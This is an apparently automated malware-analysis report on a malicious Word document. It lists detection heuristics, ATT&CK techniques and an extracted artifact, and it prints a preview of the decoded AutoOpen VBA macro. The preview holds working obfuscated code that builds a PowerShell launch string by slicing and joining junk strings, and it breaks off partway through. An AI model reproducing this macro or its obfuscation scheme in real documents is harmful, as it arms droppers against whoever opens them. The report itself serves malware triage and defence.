MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a Microsoft Office document containing a VBA macro with an AutoOpen function, indicating it is designed to execute automatically upon opening. The macro utilizes the Shell() function, a common technique for launching external processes, likely to download and execute a secondary payload. The presence of a 'Password-protected archive handoff' heuristic suggests the document may be part of a multi-stage attack where the user is prompted to open a password-protected file.
Heuristics 6
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LUREDocument gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 172134 bytes |
SHA-256: 8215ed6e896cfc5e7129b6ed840a0891cded109a7754d8630a6cd891ebd25ae6 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "UiMbLOlO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function ijnsUVlG()
On Error Resume Next
ictzhOrABVB = (pAwbnf - CDbl(160398) + HTYGAiFBbH + Fix(jWnKX / CLng(332995 * Sqr(zoaCvV))) - 748524 / Sin(EjCihGEwIJ - bFWsOcNQtv - 417431 + CLng(iZidkbzEmL)) * 850629 * Fix(160398))
wWfEAkhTvth = "b40hdMurdIjlKsHQ8kfhVl . ( $pshOMfM9w7chowershelpQcIDuOZiPkbjt"
nSfBMmQ = Left(Right(wWfEAkhTvth, 22), 8) + Left(Right(wWfEAkhTvth, 42), 13)
nRtOWHmjka = "FbrtME[U4]K9"
IRopWDTG = Left(Right(nRtOWHmjka, 7), 2) + CStr(Left(Right(nRtOWHmjka, 4), 2))
uaGHbAqaLvo = Chr(43)
OPunJwcL = "rtMj3UrAK9Qm1C$pSHu]m1ome[30NwPjm"
hdYmmI = CStr(Left(Right(OPunJwcL, 19), 4)) + CStr(Left(Right(OPunJwcL, 11), 6)) + CStr(Left(Right(OPunJwcL, 14), 1))
wnKSEuM = Chr(43)
ciTIwGjkwi = "wXX:mxNVkIIu'X') (h7XVyvtp8txMxwpKc2haVUBoe (' . ( CcmWRYcmwoIU"
zjtNjCuSlOJ = Left(Right(ciTIwGjkwi, 51), 6) + Left(Right(ciTIwGjkwi, 20), 11) + Left(Right(ciTIwGjkwi, 21), 1) + Left(Right(ciTIwGjkwi, 57), 1) + CStr(Left(Right(ciTIwGjkwi, 56), 1)) + Left(Right(ciTIwGjkwi, 60), 1)
FhkorVj = "6'CcO3wXXfmxMSPIIu"
RoaAqb = Left(Right(FhkorVj, 15), 2) + CStr(Left(Right(FhkorVj, 6), 3)) + CStr(Left(Right(FhkorVj, 17), 1))
anQCkuz = Chr(43)
vUdlVm = "wXXmmNBikII'Ec[4,ph7XVyvtp8txMxwpKc2hai24,25]-joDLHNQxWRY"
GjICMO = CStr(Left(Right(vUdlVm, 46), 6)) + CStr(Left(Right(vUdlVm, 18), 9)) + CStr(Left(Right(vUdlVm, 19), 1)) + CStr(Left(Right(vUdlVm, 52), 1)) + Left(Right(vUdlVm, 50), 1) + Left(Right(vUdlVm, 54), 1)
mMhdJTht = (icMwwQvfiI - CDbl(346320) + PncdiHz + Fix(wtYjZncoLRI / CLng(658238 * Sqr(aLzcJLf))) - 152103 / Sin(lOhcT - JzjDwC - 98878 + CLng(jvtJwnJ)) * 756312 * Fix(346320))
uEDSwoKvOK = "wXX'msBakIInimn) ph7XVyvtp8txMxwpKc2haVUn( ((imn1MmNQxWRYcmw"
hkJcduPZQ = CStr(Left(Right(uEDSwoKvOK, 49), 6)) + Left(Right(uEDSwoKvOK, 19), 10) + Left(Right(uEDSwoKvOK, 20), 1) + Left(Right(uEDSwoKvOK, 55), 1) + Left(Right(uEDSwoKvOK, 53), 1) + Left(Right(uEDSwoKvOK, 57), 1)
YLKmJ = Chr(43)
zccoz = "8i'i5C853mnX"
UuEMLzwlmf = CStr(Left(Right(zccoz, 10), 2)) + CStr(Left(Right(zccoz, 3), 2))
jRmzNvwjf = Chr(43)
lXqzOjIdC = (POGdSv - CDbl(783804) + QJbvvWiszmj + Fix(qKVcw / CLng(71958 * Sqr(ziDaXbaAEsY))) - 681527 / Sin(TSkPnRrm - ALEQubXMzt - 84684 + CLng(HjVMqplAUu)) * 66331 * Fix(783804))
DVGGiD = "53wXFcmximndau4lrlnph7XVyvtp8tUsd = &(haVUBoY"
tPWGBBrSr = Left(Right(DVGGiD, 37), 5) + Left(Right(DVGGiD, 14), 7) + Left(Right(DVGGiD, 15), 1) + Left(Right(DVGGiD, 41), 1) + CStr(Left(Right(DVGGiD, 40), 1))
OpWbTAzDi = "8inU5C853FcX"
JUIrwT = CStr(Left(Right(OpWbTAzDi, 10), 2)) + CStr(Left(Right(OpWbTAzDi, 3), 2))
scUfNrBB = Chr(43)
JsZtdLAMLTs = "53mnXUFcBSkIIu4lrlnpeUFcivtp8t"
dmllHHR = CStr(Left(Right(JsZtdLAMLTs, 25), 3)) + Left(Right(JsZtdLAMLTs, 10), 5) + CStr(Left(Right(JsZtdLAMLTs, 28), 1)) + CStr(Left(Right(JsZtdLAMLTs, 27), 1))
CoMwOG = Chr(43)
LacQnzZOQI = "8i56'C"
FUfVwz = Left(Right(LacQnzZOQI, 5), 1) + Left(Right(LacQnzZOQI, 2), 1)
tpJGb = (VIZsLjFTI - CDbl(238497) + CYVmIPV + Fix(rsiiGYO / CLng(723970 * Sqr(SsDfGckH))) - 393107 / Sin(zYnMowQQjij - QuiUtPjAm - 166733 + CLng(BijNM)) * 979373 * Fix(238497))
iKcmhvBPoN = Chr(43)
rjNCA = "u'mn65C85"
BIjziKWmS = Left(Right(rjNCA, 8), 1) + CStr(Left(Right(rjNCA, 7), 2))
ISbuDnA = Chr(43)
FwAUicdviqU = "'Lu"
ScVHf = Left(Right(FwAUicdviqU, 3), 1)
icbUiSvaVz = Chr(43)
AiPsXiP = "5C8n3wX'UFcBSkIIu4lrlnphmw-obji8txMx"
jtTZJPPl = CStr(Left(Right(AiPsXiP, 29), 4)) + CStr(Left(Right(AiPsXiP, 11), 6)) + Left(Right(AiPsXiP, 12), 1) + CStr(Left(Right(AiPsXiP, 33), 1))
ijnsUVlG = nSfBMmQ + IRopWDTG + uaGHbAqaLvo + hdYmmI + wnKSEuM + zjtNjCuSlOJ + RoaAqb + anQCkuz + GjICMO + hkJcduPZQ + YLKmJ + UuEMLzwlmf + jRmzNvwjf + tPWGBBrSr + JUIrwT + scUfNrBB + dmllHHR + CoMwOG + FUfVwz + iKcmhvBPoN + BIjziKWmS + ISbuDnA + ScVHf + icbUiSvaVz + jtTZJPPl
End Func
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.